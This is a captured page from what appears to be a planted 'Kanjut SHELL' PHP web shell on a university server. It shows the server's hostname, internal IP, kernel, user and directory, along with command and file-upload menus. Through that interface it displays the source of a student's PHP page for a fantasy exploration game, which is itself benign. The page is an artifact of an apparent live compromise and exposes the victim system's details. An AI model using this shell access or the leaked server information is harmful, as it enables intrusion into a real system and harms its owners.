Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 3.145.72.44
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/kvtillotson/www/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/kvtillotson/www/projectAreaMeadow.php
<!-- projectAreaMeadow.php - Kristin Tillotson -->

<?php   session_start();
        $char = $_SESSION['char'];
        if($char == "")
                print "<A HREF=projectCharacterSelect.php>Log In</A>";
        else
                print "<A HREF=projectCharacterModify.php> $char </A> |
        <A HREF=projectLogout.php> Logout</A>";
?>

<CENTER> <A HREF=project.php> Homepage</A> |
<A HREF=projectAreas.php> Areas</A> |
<A HREF=projectCharacterDisplay.php> Characters</A><HR>
<H2><Font color=green> Souvenirs: A Fantasy Exploration Game </font></H2><HR>

<form action=projectItem.php method=post>
The meadow is generally green and grassy, with scattered flowers.

<P> There are some sunflowers <input type=radio name=item value=sunflower> 
that track the sun as it moves overhead,
<BR> lots of grass, <input type=radio name=item value=grass> 
some of it tall enough to have seedheads, 
<input type=radio name=item value="grass seeds">
<BR> some dandelions, <input type=radio name=item value=dandelion>
a lone rosebush, <input type=radio name=item value=rose>
<BR> a trickling and mostly hidden stream, 
<input type=radio name=item value=water>
<BR> and a couple rocks  <input type=radio name=item value=rock> 
in and around the stream.

<P>
Examine a souvenir?
<input type=submit value=Yes>
</form>

Stv3n404 - 2023